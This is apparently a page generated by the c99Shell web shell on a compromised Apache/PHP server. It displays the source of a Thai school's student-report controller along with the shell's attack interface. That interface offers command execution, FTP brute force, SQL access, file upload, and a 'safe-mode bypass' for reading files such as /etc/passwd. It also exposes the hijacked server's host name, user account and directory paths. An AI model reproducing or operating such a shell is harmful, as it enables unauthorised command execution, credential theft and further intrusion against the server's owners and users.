!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/controllers/eregis/   drwxr-xr-x
Free 50.99 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     rpt_document.php (9.3 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include('rg_controller.php');
class 
Rpt_document extends Rg_controller {
//    function __construct() {
//        parent::__construct();
//    }
//****************** check valid function ******************//
    
function checkselect($str){
        if (
$str == "" || $str == "0") {
            
$this->form_validation->set_message('checkselect','กรุณาเลือก%s');
            return 
false;
        }else return 
true;
    }
//**************************************************//
    
public function searchRptRis120() {
        
$this->load->model($this->config->item("rg_folder").'mo_rg_person','pp');
        
$this->contents['rs_pp'] = $this->pp->get_options("","","","");
        
$this->output($this->config->item("rg_folder")."v_searchRptRis120");
    }


    public function 
rptRis120() {
        
$this->load->library('form_validation');
        
$this->form_validation->set_error_delimiters('<div class="error">','</div>');
        
$this->form_validation->set_rules('bNo',' ','trim|required|xss_clean');
        
$this->form_validation->set_rules('studentCode',' ','trim|required|is_natural_no_zero|xss_clean');
        
$this->form_validation->set_rules('prsId'' ''callback_checkselect');
        
$this->form_validation->set_rules('typeShow',' ','callback_checkselect');

        if(
$this->form_validation->run() == true) {
            
$this->load->model($this->config->item("rg_folder").'mo_rg_student','std');        
            
$this->load->model($this->config->item("rg_folder").'mo_rg_acadconfig','ac');
            
$this->load->model($this->config->item("rg_folder").'mo_rg_person','prs');

            
$con_qu_std = array('stdCode'    => $this->input->post('studentCode'));
            
$con_qu_prs = array('prsId'    => $this->input->post('prsId'));
            
$this->contents['qu_std'] = $this->std->qryStdJoinPfCurGen($con_qu_std);
            
$this->contents['qu_prs'] = $this->prs->qryPrsJoinPPC($con_qu_prs);
            
$this->load->model($this->config->item("rg_folder").'mo_rg_termconfig','tmc');
            
$this->contents['qu_tmc'] = $this->tmc->getBetweenDateByNowDate(getNowDate());
            
$this->load->model($this->config->item("rg_folder").'mo_rg_config','cfg');
            
$this->contents['qu_cfg'] = $this->cfg->qryCfg();
            
$this->contents['qu_ac'] = $this->ac->qryAc();
            
$this->contents['tmc'] = $this->tmc;
            
            
$this->contents['bNo'] = $this->input->post('bNo');
            
$this->contents['showStPic'] = $this->input->post('showStPic');

            if(
$this->input->post('typeShow') == 'W'){
                
$this->load->view($this->config->item("rg_folder")."v_rptRis120Word"$this->contents);
            } else {
                
$this->output_pdf($this->config->item("rg_folder")."v_rptRis120");
            }
        }else{ 
            
$this->searchRptRis120();
        }
    }


    public function 
searchRptRis121() {
        
$this->load->model($this->config->item("rg_folder").'mo_rg_curriculum','cur');
        
$this->load->model($this->config->item("rg_folder").'mo_rg_person','pp');        

        
$con_rs_cur = array('curStatus'    => 'Y');
        
$ord_rs_cur = array('curName'    => '');
        
$this->contents['rs_cur'] = $this->cur->get_options($con_rs_cur,$ord_rs_cur,'','');

        
$this->contents['tmId'] = $this->session->userdata('tmId');
        
$this->contents['acY'] = $this->session->userdata('acY');

        
$this->contents['rs_ps'] = $this->pp->get_options("","","","");
        
$this->output($this->config->item("rg_folder")."v_searchRptRis121");
    }


    public function 
rptRis121() {
        
$this->contents['typeSt'] = $typeSt $this->input->post('typeSt');
        
$this->contents['errMs'] = '';

        
$this->load->library('form_validation');
        
$this->form_validation->set_error_delimiters('<div class="error">','</div>');
        
$this->form_validation->set_rules('prsId'' ''callback_checkselect');
        
$this->form_validation->set_rules('typeSt'' ''callback_checkselect');
        
$this->form_validation->set_rules('typeShow'' ''trim|required|xss_clean');
        if(
$typeSt=='1'){
            
$this->form_validation->set_rules('curId',' ','callback_checkselect');
            
$this->form_validation->set_rules('acY',' ','callback_checkAcY');
        }else if(
$typeSt=='2'){
            
$this->form_validation->set_rules('stdtCode',' ','trim|required|is_natural_no_zero|xss_clean');
        }else if(
$typeSt=='3'){
            
$this->form_validation->set_rules('uploadfile',' ','trim|required|xss_clean');
        } 

        if(
$this->form_validation->run() == true) {            
            
$this->load->model($this->config->item("rg_folder").'mo_rg_acadconfig','ac');
            
$this->load->model($this->config->item("rg_folder").'mo_rg_person','prs');
            
            
$this->ac->get_by_key(TRUE);
            
            
$con_prs = array('prsId'    => $this->input->post('prsId'));
            
$this->prs->qryPrsJoinPPC($con_prs,'','',TRUE);
            
$this->contents['prs_name'] = $this->prs->name;

            
$this->contents['directorType'] = ($this->input->post('prsId')==$this->ac->acPrsIdDirector) ? '' 'รักษาการในตำแหน่ง';

            
$this->load->model($this->config->item("rg_folder").'mo_rg_student','std');
            if(
$typeSt=='1'){
                
$con_std = array('curId'    => $this->input->post('curId'), 'stdAdY' => $this->input->post('acY'), 'stdGenStatus' => 'Y');
                
$ord_std = array('stdCode'    => 'ASC');
                
$grp_std = array('stdCode'    => 'stdCode');
                
$this->contents['rs_std'] = $this->std->qryStdJoinPfSdtCurGen($con_std$ord_std$grp_std);
            }else if(
$typeSt=='2'){
                
$con_std = array('stdCode'    => $this->input->post('stdtCode'), 'stdGenStatus' => 'Y');
                
$ord_std = array('stdCode'    => 'ASC');
                
$grp_std = array('stdCode'    => 'stdCode');
                
$this->contents['rs_std'] = $this->std->qryStdJoinPfSdtCurGen($con_std$ord_std$grp_std);
            }else{
//$typeSt=='3'
                
if($_FILES['uploadfile']['name']==""$this->contents['errMs'] = 'ยังไม่ไดเลือกแฟ้มข้อมูล';
                else{
                    
$tmp preg_split('[\.]'$_FILES['uploadfile']['name']);
                    if(
$tmp[count($tmp)-1] != 'csv') {
                        
$this->contents['errMs'] = 'แฟ้มข้อมูลมีนามสกุลไม่ตรงที่กำหนด';
                    }else{
                        
$this->contents['filename'] = $_FILES['uploadfile']['tmp_name'];
                        
$this->contents['std'] = $this->std;
                    }
                }
            }            

            if(
$this->contents['errMs'] == ''){
                if(
$this->input->post('typeShow') == 'W'){ 
                    
$this->load->model($this->config->item("rg_folder").'mo_rg_config','cfg');
                    
$this->cfg->get_by_key(TRUE);
                    
$this->contents['cfgSiteName'] = $this->cfg->cfgSiteName;
                    
$this->contents['cfgClgAddr'] = $this->cfg->cfgClgAddr;
                    
$this->contents['cfgMinistry'] = $this->cfg->cfgMinistry;                    
                    
$this->load->view($this->config->item("rg_folder")."v_rptRis121Word"$this->contents);
                }else 
$this->output_pdf($this->config->item("rg_folder")."v_rptRis121");
            }else 
$this->output_detail($this->config->item("rg_folder")."v_rptErrorMs");
        }else{ 
            
//$this->contents['errMs'] = 'ระบุข้อมูลไม่ครบไม่สามารถออกรายงานได้';
            //$this->output_detail($this->config->item("rg_folder")."v_rptErrorMs");
            
$this->searchRptRis121();
        }
    }


    public function 
searchRptRis122() {        
        
$this->load->model($this->config->item("rg_folder").'mo_rg_person','pp');
        
        
$this->contents['rs_ps'] = $this->pp->get_options("","","","");

        
$this->output($this->config->item("rg_folder")."v_searchRptRis122");
    }


    public function 
rptRis122() {
        
$this->load->library('form_validation');
        
$this->form_validation->set_error_delimiters('<div class="error">','</div>');
        
$this->form_validation->set_rules('stdtCode',' ','trim|required|is_natural_no_zero|xss_clean');
        
$this->form_validation->set_rules('policeStation',' ','trim|required|xss_clean');
        
$this->form_validation->set_rules('postDate',' ','trim|required|xss_clean');
        
$this->form_validation->set_rules('prsId'' ''callback_checkselect');                    
        
$this->form_validation->set_rules('typeShow'' ''trim|required|xss_clean');

        if(
$this->form_validation->run() == true) {
            
$this->load->model($this->config->item("rg_folder").'mo_rg_student','std');
            
$this->load->model($this->config->item("rg_folder").'mo_rg_acadconfig','ac');            

            
$con_std = array('stdCode'    => $this->input->post('stdtCode'), 'stdGenStatus' => 'Y');
            
$ord_std = array('stdCode'    => 'ASC');
            
$grp_std = array('stdCode'    => 'stdCode');
            
$this->contents['qu_std'] = $this->std->qryStdJoinPfSdtCurGen($con_std$ord_std$grp_std);            
            
            
$this->ac->get_by_key(TRUE);            
            
            
$con_prs = array('prsId'    => $this->input->post('prsId'));
            
$this->load->model($this->config->item("rg_folder").'mo_rg_person','prs');
            
$this->prs->qryPrsJoinPPC($con_prs,'','',TRUE);
            
$this->contents['prs_name'] = $this->prs->name;            
            
$this->contents['directorType'] = ($this->input->post('prsId')==$this->ac->acPrsIdDirector) ? '' 'รักษาการในตำแหน่ง';

            
$this->contents['policeStation'] = $this->input->post('policeStation');
            
$this->contents['postDate'] = $this->input->post('postDate');

            if(
$this->input->post('typeShow') == 'W'){ 
                
$this->load->model($this->config->item("rg_folder").'mo_rg_config','cfg');
                
$this->cfg->get_by_key(TRUE);
                
$this->contents['cfgSiteName'] = $this->cfg->cfgSiteName;
                
$this->contents['cfgClgAddr'] = $this->cfg->cfgClgAddr;
                
$this->contents['cfgMinistry'] = $this->cfg->cfgMinistry;
                
$this->load->view($this->config->item("rg_folder")."v_rptRis122Word"$this->contents);
            }else 
$this->output_pdf($this->config->item("rg_folder")."v_rptRis122");
        }else{
            
//$this->contents['errMs'] = 'ระบุข้อมูลไม่ครบไม่สามารถออกรายงานได้';
            //$this->output_detail($this->config->item("rg_folder")."v_rptErrorMs");
            
$this->searchRptRis122();
        }        
    }
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0124 ]--